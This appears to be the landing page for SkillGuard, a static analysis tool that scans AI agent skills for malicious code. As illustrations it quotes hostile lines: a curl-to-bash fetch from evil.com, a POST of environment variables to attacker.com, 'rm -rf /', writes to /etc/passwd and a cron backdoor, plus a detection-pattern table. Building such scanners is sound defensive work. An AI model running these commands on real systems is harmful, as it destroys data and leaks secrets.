Open Source Security Tool

Catch Security Threats in AI Agent Skills Before They Hit Production

SkillGuard is a static analysis CLI that scans JavaScript and TypeScript codebases to detect shell injection, file tampering, and data exfiltration—before third-party AI agent skills touch your system.

Terminal
$ npx skillguard scan ./untrusted-skill
Scan complete in 847ms
CRITICAL Shell Execution detected
└─ exec('rm -rf /') at line 42
HIGH File System Write detected
└─ fs.writeFileSync('/etc/passwd', ...) at line 58
Risk Score: 92/100
Do not install
15+ Attack Patterns
AST Based Analysis
JS/TS File Support
CI/CD Ready

AI Agent Skills Are a New Attack Vector

Third-party skills execute with host system permissions. Without scanning, you're blindly trusting unknown code.

CRITICAL: Remote Code Execution

Malicious skills use exec(), eval(), or new Function() to run arbitrary commands, install backdoors, or pivot to other systems.

    exec('curl evil.com/payload | bash')

HIGH: File System Attacks

Skills can read, overwrite, or delete files, including SSH keys, credentials, and system configurations.

    fs.writeFileSync('/etc/cron.d/backdoor', ...)

MEDIUM: Data Exfiltration

Network-enabled skills can silently POST environment variables, API keys, and sensitive data to external servers.

    fetch('https://attacker.com', { body: process.env })

SUPPLY CHAIN: Dependency Attacks

Typosquatting, compromised packages, and malicious transitive dependencies introduce vulnerabilities without touching source code.

    npm install lodahs   # typosquatting

What SkillGuard Detects

AST-based pattern matching identifies real threats—not regex false positives.

Severity  Pattern                             Risk Description                          Score
CRITICAL  exec(), spawn(), execSync()         Arbitrary shell command execution         +50
CRITICAL  eval(), new Function()              Dynamic code execution / injection        +50
HIGH      fs.writeFile(), fs.unlink()         File system write/delete operations       +30
HIGH      Deno.remove(), Deno.writeFile()     Deno runtime file modifications           +30
MEDIUM    fetch(), axios(), http.request()    Network access / potential exfiltration   +20
LOW       process.env.SECRET_*                Sensitive environment variable access     +10

Dependency Scanning

Checks package.json against known malicious packages and typosquatting patterns.

JSON Output Mode

Machine-readable output for CI/CD pipelines and automated security gates.

Sub-Second Scans

Scans complete in milliseconds—ideal for pre-commit hooks and real-time checks.


Installation

Quick Run (npx)

Run immediately without installing.

npx skillguard scan ./path/to/skill

Global Install

Install globally for repeated use.

npm install -g skillguard

From Source

Clone and build from the repository.

git clone https://github.com/gauravsingh1995/skillgaurd.git
cd skillgaurd && npm i && npm run build

GitHub Actions Integration

Use the --json flag for CI/CD pipelines:

- name: Security Scan
  run: |
    # GitHub Actions runs this step with bash -e, so a non-zero exit from the scan
    # must be tested inline; checking $? on the next line would never be reached.
    if ! npx skillguard scan ./skills --json > results.json; then
      echo "Security vulnerabilities detected"
      exit 1
    fi